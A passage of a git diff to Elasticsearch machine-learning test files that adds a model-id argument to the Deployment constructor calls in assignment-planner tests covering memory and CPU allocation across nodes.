testSatisfiesAllModels_GivenAllDeploymentsAreSatisfied() { public void testSatisfiesAllDeployments_GivenOneModelHasOneAllocationLess() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) .assignModelToNode(deployment1, node1, 1) .assignModelToNode(deployment2, node2, 2) @@ -620,9 +667,9 @@ public void testSatisfiesAllDeployments_GivenOneModelHasOneAllocationLess() { public void testArePreviouslyAssignedDeploymentsAssigned_GivenTrue() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, 1, Map.of(), 0, 
null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) .assignModelToNode(deployment1, node1, 1) .assignModelToNode(deployment2, node2, 1) @@ -633,8 +680,8 @@ public void testArePreviouslyAssignedDeploymentsAssigned_GivenTrue() { public void testArePreviouslyAssignedDeploymentsAssigned_GivenFalse() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 4, null, 0, 0); AssignmentPlan plan = AssignmentPlan.builder(List.of(node1, node2), List.of(deployment1, deployment2)) .assignModelToNode(deployment1, node1, 1) .build(); @@ -644,8 +691,20 @@ public void testArePreviouslyAssignedDeploymentsAssigned_GivenFalse() { public void testCountPreviouslyAssignedThatAreStillAssigned() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 3, null, 0, 0); + Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(50).getBytes(), + 1, + 2, + Map.of(), + 3, + null, + 0, + 0 + ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -657,6 +716,7 @@ public void testCountPreviouslyAssignedThatAreStillAssigned() { 0 ); AssignmentPlan.Deployment deployment3 = new AssignmentPlan.Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(20).getBytes(), 4, @@ -668,6 +728,7 @@ public void testCountPreviouslyAssignedThatAreStillAssigned() { 0 ); AssignmentPlan.Deployment deployment4 = new AssignmentPlan.Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(20).getBytes(), 4, diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java index 24095600c42d0..2a5b9839f80c3 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlannerTests.java @@ -42,13 +42,25 @@ private static long scaleNodeSize(long nodeMemory) { public void testModelThatDoesNotFitInMemory() { { // Without perDeploymentMemory and perAllocationMemory specified List nodes = List.of(new Node("n_1", scaleNodeSize(50), 4)); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(51).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(51).getBytes(), + 4, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(nodes, List.of(deployment)).computePlan(); assertThat(plan.assignments(deployment), isEmpty()); } { // With perDeploymentMemory and 
perAllocationMemory specified List nodes = List.of(new Node("n_1", scaleNodeSize(55), 4)); Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -66,7 +78,18 @@ public void testModelThatDoesNotFitInMemory() { public void testModelWithThreadsPerAllocationNotFittingOnAnyNode() { List nodes = List.of(new Node("n_1", scaleNodeSize(100), 4), new Node("n_2", scaleNodeSize(100), 5)); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(1).getBytes(), 1, 6, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(1).getBytes(), + 1, + 6, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(nodes, List.of(deployment)).computePlan(); assertThat(plan.assignments(deployment), isEmpty()); } @@ -74,19 +97,31 @@ public void testModelWithThreadsPerAllocationNotFittingOnAnyNode() { public void testSingleModelThatFitsFullyOnSingleNode() { { Node node = new Node("n_1", scaleNodeSize(100), 4); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } { Node node = new Node("n_1", scaleNodeSize(1000), 8); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(1000).getBytes(), 8, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(1000).getBytes(), 8, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } { Node node = new Node("n_1", scaleNodeSize(10000), 16); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(10000).getBytes(), 1, @@ -102,7 +137,18 @@ public void testSingleModelThatFitsFullyOnSingleNode() { } { Node node = new Node("n_1", scaleNodeSize(100), 4); - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node), List.of(deployment)).computePlan(); assertModelFullyAssignedToNode(plan, deployment, node); } @@ -112,6 +158,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { { Node node = new Node("n_1", ByteSizeValue.ofMb(500).getBytes(), 4); Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -128,6 +175,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { { Node node = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 8, @@ -146,7 +194,18 @@ public void testSingleModelThatFitsFullyOnSingleNode_NewMemoryFields() { public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFullyAssignedOnOneNode() { Node node1 = new Node("n_1", scaleNodeSize(100), 4); Node node2 = new Node("n_2", 
scaleNodeSize(100), 4); - AssignmentPlan.Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(100).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(100).getBytes(), + 4, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); AssignmentPlan plan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment)).computePlan(); @@ -162,6 +221,7 @@ public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFully Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); AssignmentPlan.Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 4, @@ -184,7 +244,18 @@ public void testSingleModelThatFitsFullyOnSingleNode_GivenTwoNodes_ShouldBeFully } public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerAllocation() { - AssignmentPlan.Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 10, 1, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 10, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); // Single node { Node node = new Node("n_1", scaleNodeSize(100), 4); @@ -219,6 +290,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerA public void testModelWithMoreAllocationsThanAvailableCores_GivenSingleThreadPerAllocation_NewMemoryFields() { AssignmentPlan.Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 10, @@ -266,10 +338,10 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution() { Node node2 = new Node("n_2", 2 * scaleNodeSize(50), 7); Node node3 = new Node("n_3", 2 * scaleNodeSize(50), 2); Node node4 = new Node("n_4", 2 * scaleNodeSize(50), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(50).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); - Deployment deployment4 = new Deployment("m_4", ByteSizeValue.ofMb(50).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, 2, Map.of(), 0, null, 0, 0); + Deployment deployment4 = new Deployment("m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new AssignmentPlanner( List.of(node1, node2, node3, node4), @@ -322,6 +394,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() Node node3 = new Node("n_3", ByteSizeValue.ofMb(900).getBytes(), 2); Node node4 = new Node("n_4", ByteSizeValue.ofMb(900).getBytes(), 2); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -333,6 +406,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -344,6 +418,7 @@ public void 
testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment3 = new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 1, @@ -355,6 +430,7 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() ByteSizeValue.ofMb(50).getBytes() ); Deployment deployment4 = new Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 2, @@ -412,7 +488,18 @@ public void testMultipleDeploymentsAndNodesWithSingleSolution_NewMemoryFields() } public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerAllocation() { - Deployment deployment = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 10, 3, Map.of(), 0, null, 0, 0); + Deployment deployment = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 10, + 3, + Map.of(), + 0, + null, + 0, + 0 + ); // Single node { Node node = new Node("n_1", scaleNodeSize(100), 4); @@ -447,6 +534,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerA public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerAllocation_NewMemoryFields() { Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(50).getBytes(), 10, @@ -492,6 +580,7 @@ public void testModelWithMoreAllocationsThanAvailableCores_GivenThreeThreadsPerA public void testModelWithPreviousAssignmentAndNoMoreCoresAvailable() { Node node = new Node("n_1", scaleNodeSize(100), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 4, @@ -518,18 +607,18 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio new Node("n_6", ByteSizeValue.ofGb(32).getBytes(), 16) ); List deployments = List.of( - new Deployment("m_1", ByteSizeValue.ofGb(4).getBytes(), 10, 1, Map.of("n_1", 5), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_2", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_3", ByteSizeValue.ofGb(3).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_4", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of("n_3", 2), 0, null, 0, 0), - new Deployment("m_5", ByteSizeValue.ofGb(6).getBytes(), 2, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_6", ByteSizeValue.ofGb(1).getBytes(), 12, 1, Map.of(), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_7", ByteSizeValue.ofGb(1).getBytes() / 2, 12, 1, Map.of("n_2", 6), 0, null, 0, 0), - new Deployment("m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new AssignmentPlan.Deployment("m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) + new Deployment("m_1", "m_1", ByteSizeValue.ofGb(4).getBytes(), 10, 1, Map.of("n_1", 5), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_2", "m_2", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_3", "m_3", ByteSizeValue.ofGb(3).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_4", "m_4", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of("n_3", 2), 0, null, 0, 0), + new Deployment("m_5", "m_5", ByteSizeValue.ofGb(6).getBytes(), 2, 1, Map.of(), 
0, null, 0, 0), + new Deployment("m_6", "m_6", ByteSizeValue.ofGb(1).getBytes(), 12, 1, Map.of(), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_7", "m_7", ByteSizeValue.ofGb(1).getBytes() / 2, 12, 1, Map.of("n_2", 6), 0, null, 0, 0), + new Deployment("m_8", "m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_9", "m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new AssignmentPlan.Deployment("m_10", "m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_11", "m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_12", "m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) ); AssignmentPlan assignmentPlan = new AssignmentPlanner(nodes, deployments).computePlan(); @@ -556,6 +645,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio // Use mix of old and new memory fields List deployments = List.of( new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 10, @@ -566,8 +656,9 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(400).getBytes(), ByteSizeValue.ofMb(100).getBytes() ), - new Deployment("m_2", ByteSizeValue.ofMb(100).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), + new Deployment("m_2", "m_2", ByteSizeValue.ofMb(100).getBytes(), 3, 1, Map.of("n_3", 2), 0, null, 0, 0), new Deployment( + "m_3", "m_3", ByteSizeValue.ofMb(50).getBytes(), 3, @@ -579,6 +670,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(50).getBytes() ), new Deployment( + "m_4", "m_4", ByteSizeValue.ofMb(50).getBytes(), 4, @@ -590,6 +682,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(100).getBytes() ), new Deployment( + "m_5", "m_5", ByteSizeValue.ofMb(500).getBytes(), 2, @@ -601,6 +694,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(100).getBytes() ), new Deployment( + "m_6", "m_6", ByteSizeValue.ofMb(50).getBytes(), 12, @@ -612,6 +706,7 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(20).getBytes() ), new Deployment( + "m_7", "m_7", ByteSizeValue.ofMb(50).getBytes(), 12, @@ -622,11 +717,11 @@ public void testFullCoreUtilization_GivenDeploymentsWithSingleThreadPerAllocatio ByteSizeValue.ofMb(300).getBytes(), ByteSizeValue.ofMb(50).getBytes() ), - new Deployment("m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), - new Deployment("m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) + new Deployment("m_8", "m_8", ByteSizeValue.ofGb(2).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_9", "m_9", ByteSizeValue.ofGb(1).getBytes(), 4, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_10", "m_10", ByteSizeValue.ofGb(7).getBytes(), 7, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_11", "m_11", ByteSizeValue.ofGb(2).getBytes(), 3, 1, Map.of(), 0, null, 0, 0), + new Deployment("m_12", "m_12", ByteSizeValue.ofGb(1).getBytes(), 10, 1, Map.of(), 0, null, 0, 0) ); AssignmentPlan assignmentPlan = new AssignmentPlanner(nodes, 
deployments).computePlan(); @@ -731,6 +826,7 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode previousModelsPlusNew.add( new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -754,6 +850,7 @@ public void testGivenLargerModelWithPreviousAssignmentsAndSmallerModelWithoutAss Node node2 = new Node("n_2", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); Node node3 = new Node("n_3", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(1200).getBytes(), 3, @@ -764,7 +861,7 @@ public void testGivenLargerModelWithPreviousAssignmentsAndSmallerModelWithoutAss 0, 0 ); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(1100).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(1100).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2, node3), List.of(deployment1, deployment2)) .computePlan(); assertThat(assignmentPlan.getRemainingNodeMemory("n_1"), greaterThanOrEqualTo(0L)); @@ -790,6 +887,7 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( Node node1 = new Node("n_1", ByteSizeValue.ofGb(6).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofGb(6).getBytes(), 2); AssignmentPlan.Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(1200).getBytes(), 3, @@ -801,6 +899,7 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( 0 ); AssignmentPlan.Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(1100).getBytes(), 1, @@ -829,8 +928,30 @@ public void testModelWithoutCurrentAllocationsGetsAssignedIfAllocatedPreviously( public void testGivenPreviouslyAssignedDeployments_CannotAllBeAllocated() { Node node1 = new Node("n_1", scaleNodeSize(ByteSizeValue.ofGb(2).getMb()), 2); - AssignmentPlan.Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(1200).getBytes(), 1, 1, Map.of(), 1, null, 0, 0); - AssignmentPlan.Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(1100).getBytes(), 1, 1, Map.of(), 1, null, 0, 0); + AssignmentPlan.Deployment deployment1 = new Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(1200).getBytes(), + 1, + 1, + Map.of(), + 1, + null, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(1100).getBytes(), + 1, + 1, + Map.of(), + 1, + null, + 0, + 0 + ); AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1), List.of(deployment1, deployment2)).computePlan(); @@ -840,9 +961,20 @@ public void testGivenPreviouslyAssignedDeployments_CannotAllBeAllocated() { public void testGivenClusterResize_AllocationShouldNotExceedMemoryConstraints() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1840).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new AssignmentPlan.Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 
1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new AssignmentPlan.Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(800).getBytes(), + 1, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1)).computePlan(); @@ -882,9 +1014,9 @@ public void testGivenClusterResize_AllocationShouldNotExceedMemoryConstraints() public void testGivenClusterResize_ShouldAllocateEachModelAtLeastOnce() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(2600).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2600).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1)).computePlan(); @@ -953,9 +1085,9 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments() { // Ensure that plan is removing previously allocated models if not enough memory is available Node node1 = new Node("n_1", ByteSizeValue.ofMb(1840).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); // Create a plan where all deployments are assigned at least once AssignmentPlan assignmentPlan = new AssignmentPlanner(List.of(node1, node2), List.of(deployment1, deployment2, deployment3)) @@ -981,6 +1113,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie Node node1 = new Node("n_1", ByteSizeValue.ofMb(700).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 2); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -992,6 +1125,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie ByteSizeValue.ofMb(100).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -1003,6 +1137,7 @@ public void testGivenClusterResize_ShouldRemoveAllocatedDeployments_NewMemoryFie 
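+ // the 150MB below is the last Deployment constructor argument, i.e. the per-allocation memory of the new memory format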
